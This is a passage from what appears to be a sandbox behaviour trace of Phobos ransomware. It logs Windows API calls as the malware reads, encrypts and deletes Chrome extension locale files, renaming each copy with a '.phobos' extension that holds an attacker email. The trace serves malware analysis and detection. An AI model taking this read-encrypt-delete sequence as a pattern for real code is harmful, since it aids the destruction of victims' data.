Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.173] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.173] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.173] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfb, lpOverlapped=0x0) returned 1 [0151.175] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.175] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.176] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.176] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.176] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.176] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.176] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.176] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.176] CloseHandle (hObject=0x134) returned 1 [0151.176] CloseHandle (hObject=0x138) returned 1 [0151.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json")) returned 1 [0151.177] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.178] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=243) returned 1 [0151.178] CloseHandle (hObject=0x138) returned 1 [0151.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json")) returned 0x2020 [0151.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.178] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.178] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.179] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.179] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf3, lpOverlapped=0x0) returned 1 [0151.179] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.179] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.180] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.180] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.180] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.180] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.180] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.180] CloseHandle (hObject=0x138) returned 1 [0151.180] CloseHandle (hObject=0x134) returned 1 [0151.181] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json")) returned 1 [0151.181] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.182] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=257) returned 1 [0151.182] CloseHandle (hObject=0x134) returned 1 [0151.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json")) returned 0x2020 [0151.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.182] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.182] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.183] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x101, lpOverlapped=0x0) returned 1 [0151.183] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.183] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.184] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.184] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.184] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.184] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.184] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.184] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.184] CloseHandle (hObject=0x134) returned 1 [0151.185] CloseHandle (hObject=0x138) returned 1 [0151.185] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json")) returned 1 [0151.185] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.186] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=260) returned 1 [0151.186] CloseHandle (hObject=0x138) returned 1 [0151.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json")) returned 0x2020 [0151.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.186] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.186] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.187] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.187] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x104, lpOverlapped=0x0) returned 1 [0151.188] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.188] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.189] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.189] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.189] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.189] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.189] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.189] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.189] CloseHandle (hObject=0x138) returned 1 [0151.189] CloseHandle (hObject=0x134) returned 1 [0151.189] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json")) returned 1 [0151.190] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.191] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=252) returned 1 [0151.191] CloseHandle (hObject=0x134) returned 1 [0151.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json")) returned 0x2020 [0151.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.193] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.193] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.193] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.193] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfc, lpOverlapped=0x0) returned 1 [0151.194] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.194] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, 